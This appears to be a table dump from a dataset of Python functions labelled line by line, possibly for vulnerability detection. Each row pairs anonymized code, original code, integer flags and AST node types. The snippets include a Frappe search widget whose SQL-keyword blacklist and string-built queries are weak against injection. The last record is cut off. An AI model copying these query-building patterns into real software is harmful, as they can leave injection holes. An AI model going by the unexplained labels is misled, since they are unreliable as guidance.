lines (sequence, lengths 1-444) | raw_lines (sequence, lengths 1-444) | label (sequence, lengths 1-444) | type (sequence, lengths 1-444) |
---|---|---|---|
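Each row below is one record with four parallel, equal-length sequences: `lines` holds identifier-anonymized code (`VAR_*`, `FUNC_*`, `CLASS_*`), `raw_lines` the original source lines, `label` a per-line integer flag (0 in most positions, with occasional nonzero values marking lines of interest), and `type` a per-line AST-node tag such as `FunctionDef'`, `Assign'`, or `Condition`. A minimal Python sketch of how one record's sequences line up (the record literal is abridged from the first row; this is illustrative only, not the dataset's own loading code):

```python
# Abridged record from the first row below; field names match the table header.
record = {
    "lines":     ["def FUNC_2(VAR_2, VAR_3, VAR_4):...\n", "VAR_14 = VAR_3[0]\n"],
    "raw_lines": ["def _override_cfg(container, yamlkeys, value):...\n", "key = yamlkeys[0]\n"],
    "label":     [0, 0],
    "type":      ["FunctionDef'", "Assign'"],
}

# The four sequences are parallel and equal-length, so they zip per line.
for anon, raw, label, node_type in zip(
    record["lines"], record["raw_lines"], record["label"], record["type"]
):
    print(f"{label} {node_type:<14} {raw.rstrip()}  <-  {anon.rstrip()}")
```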
[
"def FUNC_2(VAR_2, VAR_3, VAR_4):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_14 = VAR_3[0]\n",
"VAR_15 = VAR_3[1:]\n",
"if len(VAR_15) == 0:\n",
"VAR_2[VAR_14] = VAR_4\n",
"if VAR_14 in VAR_2:\n",
"FUNC_2(VAR_2, VAR_15, VAR_4)\n",
"VAR_33 = {}\n",
"FUNC_2(VAR_33, VAR_15, VAR_4)\n",
"VAR_2[VAR_14] = VAR_33\n"
] | [
"def _override_cfg(container, yamlkeys, value):...\n",
"\"\"\"docstring\"\"\"\n",
"key = yamlkeys[0]\n",
"rest = yamlkeys[1:]\n",
"if len(rest) == 0:\n",
"container[key] = value\n",
"if key in container:\n",
"_override_cfg(container, rest, value)\n",
"subtree = {}\n",
"_override_cfg(subtree, rest, value)\n",
"container[key] = subtree\n"
] | [
0,
0,
0,
0,
0,
0,
0,
1,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Assign'"
] |
[
"def FUNC_2(self):...\n",
"return \"\"\"Task: %s (ID %d)\nFile: %s\n\"\"\" % (self.task[1], self.task[0], repr\n (self.filenames)) + GenericRequest.specific_info(self)\n"
] | [
"def specific_info(self):...\n",
"return \"\"\"Task: %s (ID %d)\nFile: %s\n\"\"\" % (self.task[1], self.task[0], repr\n (self.filenames)) + GenericRequest.specific_info(self)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_13(self, VAR_21):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_21 == '/':\n",
"return True\n",
"VAR_58 = self.getfile(VAR_21)\n",
"VAR_58 = None\n",
"if VAR_58 is None or VAR_58 is False:\n",
"return False\n",
"if VAR_58[VAR_2] == VAR_12:\n",
"return True\n",
"return False\n"
] | [
"def isdir(self, path):...\n",
"\"\"\"docstring\"\"\"\n",
"if path == '/':\n",
"return True\n",
"dir = self.getfile(path)\n",
"dir = None\n",
"if dir is None or dir is False:\n",
"return False\n",
"if dir[A_TYPE] == T_DIR:\n",
"return True\n",
"return False\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Assign'",
"Assign'",
"Condition",
"Return'",
"Condition",
"Return'",
"Return'"
] |
[
"def FUNC_10(self, VAR_12):...\n",
"\"\"\"docstring\"\"\"\n",
"for t in ids_to_tasks(VAR_12).split(','):\n",
"VAR_29 = get_task_module(t)\n",
"if hasattr(VAR_29, 'add_cmdline_args'):\n",
"VAR_29.add_cmdline_args(self)\n"
] | [
"def add_task_args(self, task):...\n",
"\"\"\"docstring\"\"\"\n",
"for t in ids_to_tasks(task).split(','):\n",
"agent = get_task_module(t)\n",
"if hasattr(agent, 'add_cmdline_args'):\n",
"agent.add_cmdline_args(self)\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"For",
"Assign'",
"Condition",
"Expr'"
] |
[
"def FUNC_2(self):...\n",
"if not self.current_user:\n",
"self.render('../login.html')\n",
"self.redirect('/')\n",
"return\n"
] | [
"def get(self):...\n",
"if not self.current_user:\n",
"self.render('../login.html')\n",
"self.redirect('/')\n",
"return\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Expr'",
"Expr'",
"Return'"
] |
[
"def FUNC_7(VAR_2):...\n",
"VAR_14 = {}\n",
"VAR_14['last_name'] = VAR_2.META.get('Shibboleth-sn', '')\n",
"VAR_14['first_name'] = VAR_2.META.get('Shibboleth-givenName', '')\n",
"VAR_14['email'] = VAR_2.META.get('Shibboleth-mail', '')\n",
"return VAR_14\n"
] | [
"def get_shib_info_from_request(request):...\n",
"info = {}\n",
"info['last_name'] = request.META.get('Shibboleth-sn', '')\n",
"info['first_name'] = request.META.get('Shibboleth-givenName', '')\n",
"info['email'] = request.META.get('Shibboleth-mail', '')\n",
"return info\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_7(self, VAR_6):...\n",
"\"\"\"docstring\"\"\"\n",
"return \"'\" + MySQLdb.escape_string(VAR_6) + \"'\"\n"
] | [
"def sqlForNonNone(self, value):...\n",
"\"\"\"docstring\"\"\"\n",
"return \"'\" + MySQLdb.escape_string(value) + \"'\"\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_3(VAR_1, VAR_2, VAR_3='', VAR_4=None):...\n",
"\"\"\"docstring\"\"\"\n",
"return FUNC_4(VAR_1, VAR_2['access_token'], VAR_6='', VAR_3=token_type,\n VAR_4=extra_data)\n"
] | [
"def oauth2_token_setter(remote, resp, token_type='', extra_data=None):...\n",
"\"\"\"docstring\"\"\"\n",
"return token_setter(remote, resp['access_token'], secret='', token_type=\n token_type, extra_data=extra_data)\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_44(self):...\n",
"self.cursor.execute('create table t1(a int, b int, c int, d int)')\n",
"self.cursor.execute('insert into t1 values(1,2,3,4)')\n",
"VAR_24 = self.cursor.execute('select * from t1').fetchone()\n",
"VAR_20 = str(VAR_24)\n",
"self.assertEqual(VAR_20, '(1, 2, 3, 4)')\n",
"VAR_20 = str(VAR_24[:-1])\n",
"self.assertEqual(VAR_20, '(1, 2, 3)')\n",
"VAR_20 = str(VAR_24[:1])\n",
"self.assertEqual(VAR_20, '(1,)')\n"
] | [
"def test_row_repr(self):...\n",
"self.cursor.execute('create table t1(a int, b int, c int, d int)')\n",
"self.cursor.execute('insert into t1 values(1,2,3,4)')\n",
"row = self.cursor.execute('select * from t1').fetchone()\n",
"result = str(row)\n",
"self.assertEqual(result, '(1, 2, 3, 4)')\n",
"result = str(row[:-1])\n",
"self.assertEqual(result, '(1, 2, 3)')\n",
"result = str(row[:1])\n",
"self.assertEqual(result, '(1,)')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Expr'"
] |
[
"@mock.patch('requests.post', FUNC_0)...\n",
"VAR_4 = '/api/apps'\n",
"VAR_5 = self.client.post(VAR_4)\n",
"self.assertEqual(VAR_5.status_code, 201)\n",
"VAR_6 = VAR_5.data['id']\n",
"VAR_4 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_5 = self.client.get(VAR_4)\n",
"self.assertEqual(VAR_5.status_code, 200)\n",
"self.assertEqual(len(VAR_5.data['results']), 0)\n",
"VAR_4 = '/api/apps/{app_id}/builds'.format(**locals())\n",
"VAR_8 = {'image': 'autotest/example', 'sha': 'a' * 40, 'procfile': json.\n dumps({'web': 'node server.js', 'worker': 'node worker.js'})}\n",
"VAR_5 = self.client.post(VAR_4, json.dumps(VAR_8), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_5.status_code, 201)\n",
"VAR_4 = '/api/apps/{app_id}/scale'.format(**locals())\n",
"VAR_8 = {'web': 1}\n",
"VAR_5 = self.client.post(VAR_4, json.dumps(VAR_8), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_5.status_code, 204)\n",
"VAR_4 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_5 = self.client.get(VAR_4)\n",
"self.assertEqual(VAR_5.status_code, 200)\n",
"self.assertEqual(len(VAR_5.data['results']), 1)\n",
"self.assertEqual(VAR_5.data['results'][0]['release'], 'v2')\n",
"VAR_4 = '/api/apps/{app_id}/builds'.format(**locals())\n",
"VAR_8 = {'image': 'autotest/example'}\n",
"VAR_5 = self.client.post(VAR_4, json.dumps(VAR_8), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_5.status_code, 201)\n",
"self.assertEqual(VAR_5.data['image'], VAR_8['image'])\n",
"VAR_4 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_5 = self.client.get(VAR_4)\n",
"self.assertEqual(VAR_5.status_code, 200)\n",
"self.assertEqual(len(VAR_5.data['results']), 1)\n",
"self.assertEqual(VAR_5.data['results'][0]['release'], 'v3')\n",
"VAR_4 = '/api/apps/{app_id}/config'.format(**locals())\n",
"VAR_8 = {'values': json.dumps({'KEY': 'value'})}\n",
"VAR_5 = self.client.post(VAR_4, json.dumps(VAR_8), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_5.status_code, 201)\n",
"VAR_4 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_5 = self.client.get(VAR_4)\n",
"self.assertEqual(VAR_5.status_code, 200)\n",
"self.assertEqual(len(VAR_5.data['results']), 1)\n",
"self.assertEqual(VAR_5.data['results'][0]['release'], 'v4')\n"
] | [
"@mock.patch('requests.post', mock_import_repository_task)...\n",
"url = '/api/apps'\n",
"response = self.client.post(url)\n",
"self.assertEqual(response.status_code, 201)\n",
"app_id = response.data['id']\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 0)\n",
"url = '/api/apps/{app_id}/builds'.format(**locals())\n",
"body = {'image': 'autotest/example', 'sha': 'a' * 40, 'procfile': json.\n dumps({'web': 'node server.js', 'worker': 'node worker.js'})}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 201)\n",
"url = '/api/apps/{app_id}/scale'.format(**locals())\n",
"body = {'web': 1}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 204)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 1)\n",
"self.assertEqual(response.data['results'][0]['release'], 'v2')\n",
"url = '/api/apps/{app_id}/builds'.format(**locals())\n",
"body = {'image': 'autotest/example'}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 201)\n",
"self.assertEqual(response.data['image'], body['image'])\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 1)\n",
"self.assertEqual(response.data['results'][0]['release'], 'v3')\n",
"url = '/api/apps/{app_id}/config'.format(**locals())\n",
"body = {'values': json.dumps({'KEY': 'value'})}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 201)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 1)\n",
"self.assertEqual(response.data['results'][0]['release'], 'v4')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'"
] |
[
"def FUNC_0(VAR_0, VAR_1):...\n",
"VAR_12 = ''\n",
"VAR_40 = VAR_41 = None\n",
"if VAR_1.sort_field and ',' in VAR_1.sort_field:\n",
"VAR_12 = ', '.join(['`tab{0}`.`{1}` {2}'.format(VAR_0, VAR_34.split()[0].\n strip(), VAR_34.split()[1].strip()) for VAR_34 in VAR_1.sort_field.\n split(',')])\n",
"VAR_40 = VAR_1.sort_field or 'modified'\n",
"if VAR_1.is_submittable:\n",
"VAR_41 = VAR_1.sort_field and VAR_1.sort_order or 'desc'\n",
"VAR_12 = '`tab{0}`.docstatus asc, {1}'.format(VAR_0, VAR_12)\n",
"return VAR_12\n",
"VAR_12 = '`tab{0}`.`{1}` {2}'.format(VAR_0, VAR_40 or 'modified', VAR_41 or\n 'desc')\n"
] | [
"def get_order_by(doctype, meta):...\n",
"order_by = ''\n",
"sort_field = sort_order = None\n",
"if meta.sort_field and ',' in meta.sort_field:\n",
"order_by = ', '.join(['`tab{0}`.`{1}` {2}'.format(doctype, f.split()[0].\n strip(), f.split()[1].strip()) for f in meta.sort_field.split(',')])\n",
"sort_field = meta.sort_field or 'modified'\n",
"if meta.is_submittable:\n",
"sort_order = meta.sort_field and meta.sort_order or 'desc'\n",
"order_by = '`tab{0}`.docstatus asc, {1}'.format(doctype, order_by)\n",
"return order_by\n",
"order_by = '`tab{0}`.`{1}` {2}'.format(doctype, sort_field or 'modified', \n sort_order or 'desc')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Return'",
"Assign'"
] |
[
"def FUNC_3(self, VAR_4):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_4 is None or VAR_4 == '':\n",
"return {} if not self.null else None\n",
"while isinstance(VAR_4, str):\n",
"if isinstance(VAR_4, dict):\n",
"VAR_4 = json_decode(VAR_4)\n",
"return CLASS_2(**value)\n",
"if isinstance(VAR_4, str):\n",
"return CLASS_3(VAR_4)\n",
"if isinstance(VAR_4, list):\n",
"return CLASS_4(VAR_4)\n",
"return VAR_4\n"
] | [
"def to_python(self, value):...\n",
"\"\"\"docstring\"\"\"\n",
"if value is None or value == '':\n",
"return {} if not self.null else None\n",
"while isinstance(value, str):\n",
"if isinstance(value, dict):\n",
"value = json_decode(value)\n",
"return JsonDict(**value)\n",
"if isinstance(value, str):\n",
"return JsonString(value)\n",
"if isinstance(value, list):\n",
"return JsonList(value)\n",
"return value\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Condition",
"Condition",
"Assign'",
"Return'",
"Condition",
"Return'",
"Condition",
"Return'",
"Return'"
] |
[
"def __len__(self):...\n",
"return len(self.nodes)\n"
] | [
"def __len__(self):...\n",
"return len(self.nodes)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"@VAR_0.filter...\n",
"return reverse('model-remove', VAR_5=_normal_kwargs(model_object.\n course_instance, model_name, id=model_object.id))\n"
] | [
"@register.filter...\n",
"return reverse('model-remove', kwargs=_normal_kwargs(model_object.\n course_instance, model_name, id=model_object.id))\n"
] | [
0,
0
] | [
"Condition",
"Return'"
] |
[
"def FUNC_20(self, VAR_10=None, VAR_11=None, VAR_1=None):...\n",
"VAR_10 = self.add_rule(VAR_10, VAR_11, VAR_1)\n",
"VAR_13 = self.get_rule(VAR_10)\n",
"def FUNC_39(VAR_101):...\n",
"if VAR_101.input:\n",
"VAR_13.set_input(*VAR_101.input[0], **ruleinfo.input[1])\n",
"if VAR_101.output:\n",
"VAR_13.set_output(*VAR_101.output[0], **ruleinfo.output[1])\n",
"if VAR_101.params:\n",
"VAR_13.set_params(*VAR_101.params[0], **ruleinfo.params[1])\n",
"if VAR_101.threads:\n",
"if not isinstance(VAR_101.threads, int):\n",
"if VAR_101.resources:\n",
"VAR_13.resources['_cores'] = VAR_101.threads\n",
"VAR_76, VAR_52 = VAR_101.resources\n",
"if VAR_101.priority:\n",
"if VAR_76:\n",
"if not isinstance(VAR_101.priority, int) and not isinstance(VAR_101.\n",
"if VAR_101.version:\n",
"if not all(map(lambda r: isinstance(r, int), VAR_52.values())):\n",
"VAR_13.priority = VAR_101.priority\n",
"VAR_13.version = VAR_101.version\n",
"if VAR_101.log:\n",
"VAR_13.resources.update(VAR_52)\n",
"VAR_13.set_log(*VAR_101.log[0], **ruleinfo.log[1])\n",
"if VAR_101.message:\n",
"VAR_13.message = VAR_101.message\n",
"if VAR_101.benchmark:\n",
"VAR_13.benchmark = VAR_101.benchmark\n",
"VAR_13.norun = VAR_101.norun\n",
"VAR_13.docstring = VAR_101.docstring\n",
"VAR_13.run_func = VAR_101.func\n",
"VAR_13.shellcmd = VAR_101.shellcmd\n",
"VAR_101.func.__name__ = '__{}'.format(VAR_10)\n",
"self.globals[VAR_101.func.__name__] = VAR_101.func\n",
"setattr(VAR_86, VAR_10, VAR_13)\n",
"return VAR_101.func\n"
] | [
"def rule(self, name=None, lineno=None, snakefile=None):...\n",
"name = self.add_rule(name, lineno, snakefile)\n",
"rule = self.get_rule(name)\n",
"def decorate(ruleinfo):...\n",
"if ruleinfo.input:\n",
"rule.set_input(*ruleinfo.input[0], **ruleinfo.input[1])\n",
"if ruleinfo.output:\n",
"rule.set_output(*ruleinfo.output[0], **ruleinfo.output[1])\n",
"if ruleinfo.params:\n",
"rule.set_params(*ruleinfo.params[0], **ruleinfo.params[1])\n",
"if ruleinfo.threads:\n",
"if not isinstance(ruleinfo.threads, int):\n",
"if ruleinfo.resources:\n",
"rule.resources['_cores'] = ruleinfo.threads\n",
"args, resources = ruleinfo.resources\n",
"if ruleinfo.priority:\n",
"if args:\n",
"if not isinstance(ruleinfo.priority, int) and not isinstance(ruleinfo.\n",
"if ruleinfo.version:\n",
"if not all(map(lambda r: isinstance(r, int), resources.values())):\n",
"rule.priority = ruleinfo.priority\n",
"rule.version = ruleinfo.version\n",
"if ruleinfo.log:\n",
"rule.resources.update(resources)\n",
"rule.set_log(*ruleinfo.log[0], **ruleinfo.log[1])\n",
"if ruleinfo.message:\n",
"rule.message = ruleinfo.message\n",
"if ruleinfo.benchmark:\n",
"rule.benchmark = ruleinfo.benchmark\n",
"rule.norun = ruleinfo.norun\n",
"rule.docstring = ruleinfo.docstring\n",
"rule.run_func = ruleinfo.func\n",
"rule.shellcmd = ruleinfo.shellcmd\n",
"ruleinfo.func.__name__ = '__{}'.format(name)\n",
"self.globals[ruleinfo.func.__name__] = ruleinfo.func\n",
"setattr(rules, name, rule)\n",
"return ruleinfo.func\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"FunctionDef'",
"Condition",
"Expr'",
"Condition",
"Expr'",
"Condition",
"Expr'",
"Condition",
"Condition",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Condition",
"Condition",
"Condition",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Return'"
] |
[
"def FUNC_9(self):...\n",
"self.test_strings = ('normal_string', 'string with spaces',\n 'string with quotes\"a', \"string with s-quotes'b\", 'bsn \\n A',\n 'unrecognized \\\\q escape')\n"
] | [
"def setUp(self):...\n",
"self.test_strings = ('normal_string', 'string with spaces',\n 'string with quotes\"a', \"string with s-quotes'b\", 'bsn \\n A',\n 'unrecognized \\\\q escape')\n"
] | [
0,
0
] | [
"FunctionDef'",
"Assign'"
] |
[
"def FUNC_0(self, VAR_0):...\n",
"return VAR_0.id\n"
] | [
"def to_representation(self, obj):...\n",
"return obj.id\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"import sys\n",
"from os import system\n",
"import psycopg2\n",
"import urllib.parse\n",
"import os\n",
"def FUNC_0():...\n",
"if 'DATABASE_URL' in os.environ and os.environ['DATABASE_URL']:\n",
"urllib.parse.uses_netloc.append('postgres')\n",
"VAR_12 = psycopg2.connect(database='expenses')\n",
"VAR_18 = urllib.parse.urlparse(os.environ['DATABASE_URL'])\n",
"return VAR_12\n",
"VAR_12 = psycopg2.connect(database=url.path[1:], user=url.username,\n password=url.password, host=url.hostname, port=url.port)\n",
"return VAR_12\n"
] | [
"import sys\n",
"from os import system\n",
"import psycopg2\n",
"import urllib.parse\n",
"import os\n",
"def check_heroku_db():...\n",
"if 'DATABASE_URL' in os.environ and os.environ['DATABASE_URL']:\n",
"urllib.parse.uses_netloc.append('postgres')\n",
"conn = psycopg2.connect(database='expenses')\n",
"url = urllib.parse.urlparse(os.environ['DATABASE_URL'])\n",
"return conn\n",
"conn = psycopg2.connect(database=url.path[1:], user=url.username, password=\n url.password, host=url.hostname, port=url.port)\n",
"return conn\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"ImportFrom'",
"Import'",
"Import'",
"Import'",
"FunctionDef'",
"Condition",
"Expr'",
"Assign'",
"Assign'",
"Return'",
"Assign'",
"Return'"
] |
[
"def FUNC_2(VAR_1: HttpRequest):...\n",
""
] | [
"def action_add_single_media(request: HttpRequest):...\n",
""
] | [
0,
0
] | [
"FunctionDef'",
"Condition"
] |
[
"from __future__ import unicode_literals\n",
"import frappe, json\n",
"from frappe.utils import cstr, unique\n",
"from frappe import _\n",
"from six import string_types\n",
"def FUNC_0(VAR_0):...\n",
"VAR_12 = ['select', 'delete', 'drop', 'update', 'case', 'and', 'or', 'like']\n",
"def FUNC_6():...\n",
"VAR_13.throw(_('Invalid Search Field'), VAR_13.DataError)\n",
"if len(VAR_0) >= 3:\n",
"if '=' in VAR_0:\n",
"@VAR_13.whitelist()...\n",
"FUNC_6()\n",
"if ' --' in VAR_0:\n",
"FUNC_2(VAR_1, VAR_2, VAR_3, VAR_0=searchfield, VAR_5=page_length, VAR_4=filters\n )\n",
"FUNC_6()\n",
"if any(' {0} '.format(keyword) in VAR_0.split() for keyword in VAR_12):\n",
"VAR_13.response['results'] = FUNC_4(VAR_13.response['values'])\n",
"FUNC_6()\n",
"if any(keyword in VAR_0.split() for keyword in VAR_12):\n",
"@VAR_13.whitelist()...\n",
"FUNC_6()\n",
"if isinstance(VAR_4, string_types):\n",
"VAR_4 = json.loads(VAR_4)\n",
"VAR_9 = VAR_13.get_meta(VAR_1)\n",
"if VAR_0:\n",
"FUNC_0(VAR_0)\n",
"if not VAR_0:\n",
"VAR_0 = 'name'\n",
"VAR_14 = VAR_13.get_hooks().standard_queries or {}\n",
"if VAR_3 and VAR_3.split()[0].lower() != 'select':\n",
"VAR_13.response['values'] = VAR_13.call(VAR_3, VAR_1, VAR_2, VAR_0, VAR_6,\n VAR_5, VAR_4, VAR_8=as_dict)\n",
"if not VAR_3 and VAR_1 in VAR_14:\n",
"def FUNC_3(VAR_9, VAR_10):...\n",
"FUNC_2(VAR_1, VAR_2, VAR_14[VAR_1][0], VAR_0, VAR_6, VAR_5, VAR_4)\n",
"if VAR_3:\n",
"VAR_15 = VAR_9.search_fields and VAR_9.search_fields.split(',') or []\n",
"VAR_13.throw(_('This query style is discontinued'))\n",
"if isinstance(VAR_4, dict):\n",
"VAR_16 = [VAR_9.title_field\n ] if VAR_9.title_field and VAR_9.title_field not in VAR_15 else []\n",
"VAR_25 = VAR_4.items()\n",
"if VAR_4 == None:\n",
"VAR_15 = ['name'] + VAR_15 + VAR_16\n",
"VAR_4 = []\n",
"VAR_4 = []\n",
"VAR_19 = []\n",
"if not VAR_10 in VAR_15:\n",
"for f in VAR_25:\n",
"if VAR_2:\n",
"VAR_15 = VAR_15 + [VAR_10]\n",
"return VAR_15\n",
"if isinstance(f[1], (list, tuple)):\n",
"VAR_26 = ['name']\n",
"if VAR_9.get('fields', {'fieldname': 'enabled', 'fieldtype': 'Check'}):\n",
"VAR_4.append([VAR_1, f[0], f[1][0], f[1][1]])\n",
"VAR_4.append([VAR_1, f[0], '=', f[1]])\n",
"if VAR_9.title_field:\n",
"VAR_4.append([VAR_1, 'enabled', '=', 1])\n",
"if VAR_9.get('fields', {'fieldname': 'disabled', 'fieldtype': 'Check'}):\n",
"VAR_26.append(VAR_9.title_field)\n",
"if VAR_9.search_fields:\n",
"VAR_4.append([VAR_1, 'disabled', '!=', 1])\n",
"VAR_20 = FUNC_3(VAR_9, VAR_0 or 'name')\n",
"VAR_26.extend(VAR_9.get_search_fields())\n",
"for f in VAR_26:\n",
"if VAR_7:\n",
"VAR_27 = VAR_9.get_field(f.strip())\n",
"VAR_20 = list(set(VAR_20 + json.loads(VAR_7)))\n",
"VAR_21 = [('`tab%s`.`%s`' % (VAR_9.name, f.strip())) for f in VAR_20]\n",
"if f == 'name' or VAR_27 and VAR_27.fieldtype in ['Data', 'Text',\n",
"VAR_21.append('locate(\"{_txt}\", `tab{doctype}`.`name`) as `_relevance`'.\n format(_txt=frappe.db.escape((txt or '').replace('%', '')), VAR_1=\n frappe.db.escape(doctype)))\n",
"VAR_19.append([VAR_1, f.strip(), 'like', '%{0}%'.format(VAR_2)])\n",
"from frappe.model.db_query import get_order_by\n",
"VAR_22 = get_order_by(VAR_1, VAR_9)\n",
"VAR_23 = 'if(_relevance, _relevance, 99999), `tab{0}`.idx desc, {1}'.format(\n VAR_1, VAR_22)\n",
"VAR_24 = VAR_13.get_list(VAR_1, VAR_4=filters, VAR_20=formatted_fields,\n VAR_19=or_filters, limit_start=start, limit_page_length=page_length,\n VAR_23=order_by, ignore_permissions=True if doctype == 'DocType' else \n False, as_list=not as_dict)\n",
"if VAR_8:\n",
"for r in VAR_24:\n",
"VAR_13.response['values'] = [r[:-1] for r in VAR_24]\n",
"r.pop('_relevance')\n",
"VAR_13.response['values'] = VAR_24\n"
] | [
"from __future__ import unicode_literals\n",
"import frappe, json\n",
"from frappe.utils import cstr, unique\n",
"from frappe import _\n",
"from six import string_types\n",
"def sanitize_searchfield(searchfield):...\n",
"blacklisted_keywords = ['select', 'delete', 'drop', 'update', 'case', 'and',\n 'or', 'like']\n",
"def _raise_exception():...\n",
"frappe.throw(_('Invalid Search Field'), frappe.DataError)\n",
"if len(searchfield) >= 3:\n",
"if '=' in searchfield:\n",
"@frappe.whitelist()...\n",
"_raise_exception()\n",
"if ' --' in searchfield:\n",
"search_widget(doctype, txt, query, searchfield=searchfield, page_length=\n page_length, filters=filters)\n",
"_raise_exception()\n",
"if any(' {0} '.format(keyword) in searchfield.split() for keyword in\n",
"frappe.response['results'] = build_for_autosuggest(frappe.response['values'])\n",
"_raise_exception()\n",
"if any(keyword in searchfield.split() for keyword in blacklisted_keywords):\n",
"@frappe.whitelist()...\n",
"_raise_exception()\n",
"if isinstance(filters, string_types):\n",
"filters = json.loads(filters)\n",
"meta = frappe.get_meta(doctype)\n",
"if searchfield:\n",
"sanitize_searchfield(searchfield)\n",
"if not searchfield:\n",
"searchfield = 'name'\n",
"standard_queries = frappe.get_hooks().standard_queries or {}\n",
"if query and query.split()[0].lower() != 'select':\n",
"frappe.response['values'] = frappe.call(query, doctype, txt, searchfield,\n start, page_length, filters, as_dict=as_dict)\n",
"if not query and doctype in standard_queries:\n",
"def get_std_fields_list(meta, key):...\n",
"search_widget(doctype, txt, standard_queries[doctype][0], searchfield,\n start, page_length, filters)\n",
"if query:\n",
"sflist = meta.search_fields and meta.search_fields.split(',') or []\n",
"frappe.throw(_('This query style is discontinued'))\n",
"if isinstance(filters, dict):\n",
"title_field = [meta.title_field\n ] if meta.title_field and meta.title_field not in sflist else []\n",
"filters_items = filters.items()\n",
"if filters == None:\n",
"sflist = ['name'] + sflist + title_field\n",
"filters = []\n",
"filters = []\n",
"or_filters = []\n",
"if not key in sflist:\n",
"for f in filters_items:\n",
"if txt:\n",
"sflist = sflist + [key]\n",
"return sflist\n",
"if isinstance(f[1], (list, tuple)):\n",
"search_fields = ['name']\n",
"if meta.get('fields', {'fieldname': 'enabled', 'fieldtype': 'Check'}):\n",
"filters.append([doctype, f[0], f[1][0], f[1][1]])\n",
"filters.append([doctype, f[0], '=', f[1]])\n",
"if meta.title_field:\n",
"filters.append([doctype, 'enabled', '=', 1])\n",
"if meta.get('fields', {'fieldname': 'disabled', 'fieldtype': 'Check'}):\n",
"search_fields.append(meta.title_field)\n",
"if meta.search_fields:\n",
"filters.append([doctype, 'disabled', '!=', 1])\n",
"fields = get_std_fields_list(meta, searchfield or 'name')\n",
